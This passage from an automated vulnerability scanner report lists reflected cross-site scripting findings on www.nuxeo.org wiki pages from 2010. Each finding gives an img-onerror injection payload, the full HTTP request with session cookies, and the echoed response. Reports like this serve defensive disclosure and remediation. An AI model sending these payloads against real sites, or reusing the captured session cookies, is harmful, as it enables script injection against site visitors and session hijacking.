Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/Tagsf901e%3Cimg+src%3Da+onerror%3Dalert%281%29%3E63acc2cbc28'>Tagsf901e<img src=a onerror=alert(1)>63acc2cbc28</a>
...[SNIP]...

1.111. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Tags

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d0e5"><img%20src%3da%20onerror%3dalert(1)>430e2cf64ed was submitted in the REST URL parameter 5. This input was echoed as 7d0e5"><img src=a onerror=alert(1)>430e2cf64ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Tags7d0e5"><img%20src%3da%20onerror%3dalert(1)>430e2cf64ed HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:05 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12882
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/Tags7d0e5%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E430e2cf64ed?format=xar&amp;name=Main.Tags7d0e5"><img src=a onerror=alert(1)>430e2cf64ed&amp;pages=Main.Tags7d0e5">
...[SNIP]...

1.112. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Understanding+JBoss+Directories

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f0e56<img%20src%3da%20onerror%3dalert(1)>8311f0b5e3a was submitted in the REST URL parameter 4. This input was echoed as f0e56<img src=a onerror=alert(1)>8311f0b5e3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainf0e56<img%20src%3da%20onerror%3dalert(1)>8311f0b5e3a/Understanding+JBoss+Directories HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:19 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13187
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Mainf0e56%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8311f0b5e3a/">Mainf0e56<img src=a onerror=alert(1)>8311f0b5e3a</a>
...[SNIP]...

1.113. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Understanding+JBoss+Directories

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be1aa"><img%20src%3da%20onerror%3dalert(1)>c2cf5c63703 was submitted in the REST URL parameter 4. This input was echoed as be1aa"><img src=a onerror=alert(1)>c2cf5c63703 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainbe1aa"><img%20src%3da%20onerror%3dalert(1)>c2cf5c63703/Understanding+JBoss+Directories HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:33 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13253
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Mainbe1aa%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec2cf5c63703/Understanding+JBoss+Directories?format=xar&amp;name=Mainbe1aa"><img src=a onerror=alert(1)>c2cf5c63703.Understanding JBoss Directories&amp;pages=Mainbe1aa">
...[SNIP]...

1.114. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Understanding+JBoss+Directories

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e87d7"><img%20src%3da%20onerror%3dalert(1)>89b0697bfae was submitted in the REST URL parameter 5. This input was echoed as e87d7"><img src=a onerror=alert(1)>89b0697bfae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Understanding+JBoss+Directoriese87d7"><img%20src%3da%20onerror%3dalert(1)>89b0697bfae HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:49 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13237
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
a href="http://www.nuxeo.org/xwiki/bin/export/Main/Understanding+JBoss+Directoriese87d7%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E89b0697bfae?format=xar&amp;name=Main.Understanding JBoss Directoriese87d7"><img src=a onerror=alert(1)>89b0697bfae&amp;pages=Main.Understanding JBoss Directoriese87d7">
...[SNIP]...

1.115. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Understanding+JBoss+Directories

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a2dfb<img%20src%3da%20onerror%3dalert(1)>c65f4a3268c was submitted in the REST URL parameter 5. This input was echoed as a2dfb<img src=a onerror=alert(1)>c65f4a3268c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Understanding+JBoss+Directoriesa2dfb<img%20src%3da%20onerror%3dalert(1)>c65f4a3268c HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:50 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13175
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directoriesa2dfb%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec65f4a3268c'>Understanding JBoss Directoriesa2dfb<img src=a onerror=alert(1)>c65f4a3268c</a>
...[SNIP]...

1.116. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Using+Nuxeo+API

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload eab17<img%20src%3da%20onerror%3dalert(1)>123105c7679 was submitted in the REST URL parameter 4. This input was echoed as eab17<img src=a onerror=alert(1)>123105c7679 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maineab17<img%20src%3da%20onerror%3dalert(1)>123105c7679/Using+Nuxeo+API HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:35 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12979
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Maineab17%3Cimg+src%3Da+onerror%3Dalert%281%29%3E123105c7679/">Maineab17<img src=a onerror=alert(1)>123105c7679</a>
...[SNIP]...

1.117. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Using+Nuxeo+API

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49dbe"><img%20src%3da%20onerror%3dalert(1)>8944e5657f5 was submitted in the REST URL parameter 4. This input was echoed as 49dbe"><img src=a onerror=alert(1)>8944e5657f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main49dbe"><img%20src%3da%20onerror%3dalert(1)>8944e5657f5/Using+Nuxeo+API HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:11 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13045
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main49dbe%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8944e5657f5/Using+Nuxeo+API?format=xar&amp;name=Main49dbe"><img src=a onerror=alert(1)>8944e5657f5.Using Nuxeo API&amp;pages=Main49dbe">
...[SNIP]...

1.118. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Using+Nuxeo+API

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50755"><img%20src%3da%20onerror%3dalert(1)>95dc43f2514 was submitted in the REST URL parameter 5. This input was echoed as 50755"><img src=a onerror=alert(1)>95dc43f2514 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Using+Nuxeo+API50755"><img%20src%3da%20onerror%3dalert(1)>95dc43f2514 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:28 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13029
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/Using+Nuxeo+API50755%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E95dc43f2514?format=xar&amp;name=Main.Using Nuxeo API50755"><img src=a onerror=alert(1)>95dc43f2514&amp;pages=Main.Using Nuxeo API50755">
...[SNIP]...

1.119. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Using+Nuxeo+API

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5e592<img%20src%3da%20onerror%3dalert(1)>203fdc532cf was submitted in the REST URL parameter 5. This input was echoed as 5e592<img src=a onerror=alert(1)>203fdc532cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Using+Nuxeo+API5e592<img%20src%3da%20onerror%3dalert(1)>203fdc532cf HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:06 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12967
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API5e592%3Cimg+src%3Da+onerror%3Dalert%281%29%3E203fdc532cf'>Using Nuxeo API5e592<img src=a onerror=alert(1)>203fdc532cf</a>
...[SNIP]...

1.120. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WebRss

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cb09"><img%20src%3da%20onerror%3dalert(1)>27e195a34ef was submitted in the REST URL parameter 4. This input was echoed as 7cb09"><img src=a onerror=alert(1)>27e195a34ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main7cb09"><img%20src%3da%20onerror%3dalert(1)>27e195a34ef/WebRss HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:12:50 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12924
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main7cb09%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E27e195a34ef/WebRss?format=xar&amp;name=Main7cb09"><img src=a onerror=alert(1)>27e195a34ef.WebRss&amp;pages=Main7cb09">
...[SNIP]...

1.121. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WebRss

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 76490<img%20src%3da%20onerror%3dalert(1)>4484ac9bb2 was submitted in the REST URL parameter 4. This input was echoed as 76490<img src=a onerror=alert(1)>4484ac9bb2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main76490<img%20src%3da%20onerror%3dalert(1)>4484ac9bb2/WebRss HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:34 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12845
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main76490%3Cimg+src%3Da+onerror%3Dalert%281%29%3E4484ac9bb2/">Main76490<img src=a onerror=alert(1)>4484ac9bb2</a>
...[SNIP]...

1.122. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WebRss

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cbc6a<img%20src%3da%20onerror%3dalert(1)>c41e6b9b885 was submitted in the REST URL parameter 5. This input was echoed as cbc6a<img src=a onerror=alert(1)>c41e6b9b885 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/WebRsscbc6a<img%20src%3da%20onerror%3dalert(1)>c41e6b9b885 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:01 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12846
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/WebRsscbc6a%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec41e6b9b885'>WebRsscbc6a<img src=a onerror=alert(1)>c41e6b9b885</a>
...[SNIP]...

1.123. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WebRss

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89aa6"><img%20src%3da%20onerror%3dalert(1)>625cf66d6b7 was submitted in the REST URL parameter 5. This input was echoed as 89aa6"><img src=a onerror=alert(1)>625cf66d6b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/WebRss89aa6"><img%20src%3da%20onerror%3dalert(1)>625cf66d6b7 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
